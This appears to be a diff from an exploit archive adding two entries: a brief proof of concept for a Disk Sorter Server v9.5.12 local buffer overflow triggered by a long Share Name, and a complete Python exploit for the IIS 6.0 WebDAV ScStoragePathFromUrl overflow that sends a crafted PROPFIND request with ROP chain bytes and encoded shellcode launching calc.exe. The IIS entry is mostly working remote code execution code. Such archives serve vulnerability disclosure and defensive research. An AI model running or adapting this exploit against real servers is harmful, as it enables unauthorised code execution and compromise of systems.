The key can be downloaded here: https://www.foxmole.com/advisories-key-3812092199E3277C.asc

177
platforms/windows/dos/41734.c Executable file

File diff suppressed because one or more lines are too long

51
platforms/windows/dos/41737.txt Executable file
View file

@ -0,0 +1,51 @@
[+] Title: Disk Sorter Server v9.5.12 - Local Stack-based buffer overflow
[+] Credits / Discovery: Nassim Asrir
[+] Author Email: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
[+] Author Company: Henceforth
[+] CVE: N/A
Vendor:
===============
http://www.disksorter.com/
Download:
===========
http://www.disksorter.com/setups/disksortersrv_setup_v9.5.12.exe
Vulnerability Type:
===================
local stack-based buffer overflow
POC:
===================
Launch the program click on :
1 - Server
2 - Connect
3 - and in the Share Name field inject (5000 "A") then the program crashed see the picture.
CVE Reference:
===============
N/A
Tested on:
===============
Windows 7
Win xp

View file

@ -0,0 +1,45 @@
'''
Description:Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.
Additional Information: the ScStoragePathFromUrl function is called twice
Vulnerability Type: Buffer overflow
Vendor of Product: Microsoft
Affected Product Code Base: Windows Server 2003 R2
Affected Component: ScStoragePathFromUrl
Attack Type: Remote
Impact Code execution: true
Attack Vectors: crafted PROPFIND data
Has vendor confirmed or acknowledged the vulnerability?:true
Discoverer:Zhiniang Peng and Chen Wu.
Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China
'''
#------------Our payload set up a ROP chain by using the overflow 3 times. It will launch a calc.exe which shows the bug is really dangerous.
#written by Zhiniang Peng and Chen Wu. Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China
#-----------Email: edwardz@foxmail.com
import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('127.0.0.1',80))
pay='PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
pay+='If: <http://localhost/aaaaaaa'
pay+='\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80\xb3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
pay+='>'
pay+=' (Not <locktoken:write1>) <http://localhost/bbbbbbb'
pay+='\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
shellcode='VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJT1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5ZNL0ZMV5L5LMX1ZLP0V3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X06013W7M0B2X5O5R2O02LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4U9O2T9TML5K0RMP0E3OJZ2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ1Y8NMLML2Q8Q002U100Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YMW5MJULY7R1MKRKQ5W0X0N3U1KLP9O1P1L3W9P5POO0F2SMXJNJMJS8KJNKPA'
pay+=shellcode
pay+='>\r\n\r\n'
print pay
sock.send(pay)
data = sock.recv(80960)
print data
sock.close